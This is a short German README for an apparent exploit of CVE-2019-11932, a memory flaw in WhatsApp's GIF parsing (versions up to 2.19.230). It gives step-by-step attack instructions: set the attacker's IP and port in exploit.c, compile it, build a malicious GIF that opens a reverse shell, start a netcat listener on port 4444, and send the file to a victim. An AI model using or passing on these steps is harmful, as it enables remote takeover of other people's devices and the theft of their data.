
Exploit für CVE-2019-11932, ein Pufferüberlauf in WhatsApps GIF-Parsing (Versionen ≤2.19.230). Kompiliert ein schädliches GIF, das eine Reverse Shell zu einer vom Angreifer angegebenen IP und Port auslöst.
Ändern Sie die Hör-Adresse (die des Angreifers) sowie den Hör-Port in der Datei exploit.c
Folgender Hex-Code:
3139 322e 3136
382e 322e 3732 2034 3434 3420
Kompilieren Sie den Code:
gcc -o exploit egif_lib.c exploit.c
Starten Sie die kompilierte Datei ./exploit exploit.gif
Kopieren Sie die Ausgabe in ein GIF
Starten Sie den Netcat-Listener:
nc -lvp 4444
Senden Sie es an Ihr Opfer!
Betroffene Versionen: 2.19.230 und darunter
Offiziell gepatcht in Version 2.19.244
Quelle: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
LinkedIn: https://www.linkedin.com/in/thomas-lounis-749456175/